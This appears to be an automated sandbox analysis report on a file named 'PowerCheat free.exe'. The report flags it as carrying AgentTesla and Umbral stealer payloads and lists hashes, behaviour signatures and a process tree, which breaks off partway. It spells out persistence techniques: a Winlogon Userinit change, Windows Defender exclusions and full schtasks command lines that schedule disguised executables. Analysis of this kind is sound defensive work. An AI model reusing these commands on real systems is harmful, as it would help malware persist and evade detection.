Analysis
-
max time kernel
48s -
max time network
50s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
12-06-2024 19:15
Behavioral task
behavioral1
Sample
PowerCheat free.exe
Resource
win10v2004-20240611-en
General
-
Target
PowerCheat free.exe
-
Size
8.0MB
-
MD5
63e3124b3360f64808cddb6b5b7dd0b7
-
SHA1
b5308a58f50c548c66b1c46543537812605b6973
-
SHA256
3e96e5c7ce88b7a27dbdb0341fe7dc7edd69cfeaba35b7b3019731de8ed81840
-
SHA512
f57876faf30d4c5e8794bf5e1c70747ca58c629df54f121339cbb6444df2cfa13315952233e32471448b5c919b62147ea70af7d66262ce1658fd9d87cea06f4f
-
SSDEEP
196608:o/TYUOztYQC4wmOH2dWJMiUb5zBXVnTpkSIgzeRnZYk:kWzupHjJdwbdkSpzYZYk
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000023573-27.dat family_umbral behavioral1/memory/1104-37-0x0000000000400000-0x0000000000C0F000-memory.dmp family_umbral behavioral1/memory/4896-35-0x000002153CC80000-0x000002153CCC0000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\firefox.exe" PowerCheatEmuHider.exe -
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/2396-43-0x000002884C1E0000-0x000002884C3F4000-memory.dmp family_agenttesla -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1968 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts ldld.exe -
Modifies AppInit DLL entries 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation PowerCheat free.exe -
Executes dropped EXE 3 IoCs
pid Process 2396 PowerCheat_free.exe 4608 PowerCheatEmuHider.exe 4896 ldld.exe -
Loads dropped DLL 15 IoCs
pid Process 5532 Process not Found 6132 Process not Found 1552 Process not Found 5432 Process not Found 5320 WmiApSrv.exe 1272 wmiprvse.exe 6072 Process not Found 6100 Process not Found 2420 Process not Found 5476 Process not Found 6864 Process not Found 6384 Process not Found 7080 Process not Found 6660 Process not Found 4976 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 75 discord.com 76 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\xdwd.dll PowerCheatEmuHider.exe File created C:\Windows\conshost.exe PowerCheatEmuHider.exe File opened for modification C:\Windows\conshost.exe PowerCheatEmuHider.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6124 schtasks.exe 5320 schtasks.exe 5260 schtasks.exe 5572 schtasks.exe 3068 schtasks.exe 4264 schtasks.exe 7148 schtasks.exe 6752 schtasks.exe 6092 schtasks.exe 6936 schtasks.exe 6460 schtasks.exe 5276 schtasks.exe 5444 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2864 wmic.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS PowerCheat_free.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer PowerCheat_free.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion PowerCheat_free.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings firefox.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5604 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4896 ldld.exe 1968 powershell.exe 1968 powershell.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2052 powershell.exe 2052 powershell.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 4800 msedge.exe 4800 msedge.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2932 msedge.exe 2932 msedge.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 6072 powershell.exe 6072 powershell.exe 6072 powershell.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 5276 powershell.exe 5276 powershell.exe 5276 powershell.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 220 identity_helper.exe 220 identity_helper.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe 2396 PowerCheat_free.exe 2396 PowerCheat_free.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe 4608 PowerCheatEmuHider.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4608 PowerCheatEmuHider.exe Token: SeDebugPrivilege 4896 ldld.exe Token: SeDebugPrivilege 2396 PowerCheat_free.exe Token: SeIncreaseQuotaPrivilege 4588 wmic.exe Token: SeSecurityPrivilege 4588 wmic.exe Token: SeTakeOwnershipPrivilege 4588 wmic.exe Token: SeLoadDriverPrivilege 4588 wmic.exe Token: SeSystemProfilePrivilege 4588 wmic.exe Token: SeSystemtimePrivilege 4588 wmic.exe Token: SeProfSingleProcessPrivilege 4588 wmic.exe Token: SeIncBasePriorityPrivilege 4588 wmic.exe Token: SeCreatePagefilePrivilege 4588 wmic.exe Token: SeBackupPrivilege 4588 wmic.exe Token: SeRestorePrivilege 4588 wmic.exe Token: SeShutdownPrivilege 4588 wmic.exe Token: SeDebugPrivilege 4588 wmic.exe Token: SeSystemEnvironmentPrivilege 4588 wmic.exe Token: SeRemoteShutdownPrivilege 4588 wmic.exe Token: SeUndockPrivilege 4588 wmic.exe Token: SeManageVolumePrivilege 4588 wmic.exe Token: 33 4588 wmic.exe Token: 34 4588 wmic.exe Token: 35 4588 wmic.exe Token: 36 4588 wmic.exe Token: SeIncreaseQuotaPrivilege 4588 wmic.exe Token: SeSecurityPrivilege 4588 wmic.exe Token: SeTakeOwnershipPrivilege 4588 wmic.exe Token: SeLoadDriverPrivilege 4588 wmic.exe Token: SeSystemProfilePrivilege 4588 wmic.exe Token: SeSystemtimePrivilege 4588 wmic.exe Token: SeProfSingleProcessPrivilege 4588 wmic.exe Token: SeIncBasePriorityPrivilege 4588 wmic.exe Token: SeCreatePagefilePrivilege 4588 wmic.exe Token: SeBackupPrivilege 4588 wmic.exe Token: SeRestorePrivilege 4588 wmic.exe Token: SeShutdownPrivilege 4588 wmic.exe Token: SeDebugPrivilege 4588 wmic.exe Token: SeSystemEnvironmentPrivilege 4588 wmic.exe Token: SeRemoteShutdownPrivilege 4588 wmic.exe Token: SeUndockPrivilege 4588 wmic.exe Token: SeManageVolumePrivilege 4588 wmic.exe Token: 33 4588 wmic.exe Token: 34 4588 wmic.exe Token: 35 4588 wmic.exe Token: 36 4588 wmic.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 3504 powershell.exe Token: SeDebugPrivilege 1316 firefox.exe Token: SeDebugPrivilege 1316 firefox.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeIncreaseQuotaPrivilege 5696 wmic.exe Token: SeSecurityPrivilege 5696 wmic.exe Token: SeTakeOwnershipPrivilege 5696 wmic.exe Token: SeLoadDriverPrivilege 5696 wmic.exe Token: SeSystemProfilePrivilege 5696 wmic.exe Token: SeSystemtimePrivilege 5696 wmic.exe Token: SeProfSingleProcessPrivilege 5696 wmic.exe Token: SeIncBasePriorityPrivilege 5696 wmic.exe Token: SeCreatePagefilePrivilege 5696 wmic.exe Token: SeBackupPrivilege 5696 wmic.exe Token: SeRestorePrivilege 5696 wmic.exe Token: SeShutdownPrivilege 5696 wmic.exe Token: SeDebugPrivilege 5696 wmic.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe 2932 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1316 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1104 wrote to memory of 2396 1104 PowerCheat free.exe 84 PID 1104 wrote to memory of 2396 1104 PowerCheat free.exe 84 PID 1104 wrote to memory of 4608 1104 PowerCheat free.exe 86 PID 1104 wrote to memory of 4608 1104 PowerCheat free.exe 86 PID 1104 wrote to memory of 4896 1104 PowerCheat free.exe 87 PID 1104 wrote to memory of 4896 1104 PowerCheat free.exe 87 PID 4896 wrote to memory of 4588 4896 ldld.exe 89 PID 4896 wrote to memory of 4588 4896 ldld.exe 89 PID 4896 wrote to memory of 1376 4896 ldld.exe 92 PID 4896 wrote to memory of 1376 4896 ldld.exe 92 PID 4896 wrote to memory of 1968 4896 ldld.exe 94 PID 4896 wrote to memory of 1968 4896 ldld.exe 94 PID 4896 wrote to memory of 2052 4896 ldld.exe 96 PID 4896 wrote to memory of 2052 4896 ldld.exe 96 PID 4896 wrote to memory of 3504 4896 ldld.exe 100 PID 4896 wrote to memory of 3504 4896 ldld.exe 100 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 3308 wrote to memory of 1316 3308 firefox.exe 102 PID 2396 wrote to memory of 2932 2396 PowerCheat_free.exe 103 PID 2396 wrote to memory of 2932 2396 PowerCheat_free.exe 103 PID 2932 wrote to memory of 5048 2932 msedge.exe 104 PID 2932 wrote to memory of 5048 2932 msedge.exe 104 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 PID 1316 wrote to memory of 3556 1316 firefox.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1376 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PowerCheat free.exe"C:\Users\Admin\AppData\Local\Temp\PowerCheat free.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\PowerCheat_free.exe"C:\Users\Admin\AppData\Local\Temp\PowerCheat_free.exe"2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/powergirlso23⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa0d8846f8,0x7ffa0d884708,0x7ffa0d8847184⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:24⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:84⤵PID:456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:14⤵PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:14⤵PID:736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:14⤵PID:5556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:84⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:14⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:14⤵PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:14⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:14⤵PID:3660
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" & exit3⤵PID:1668
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe"4⤵
- Creates scheduled task(s)
PID:5276
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:5316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4524
-
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5260
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST & exit3⤵PID:1272
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6092
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:4008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5572
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:5556
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6124
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:6132
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5320
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:5276
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4264
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:6100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5444
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:6840
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6936
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:6360
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6460
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:7036
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:7148
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:6652
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6752
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit3⤵PID:6924
-
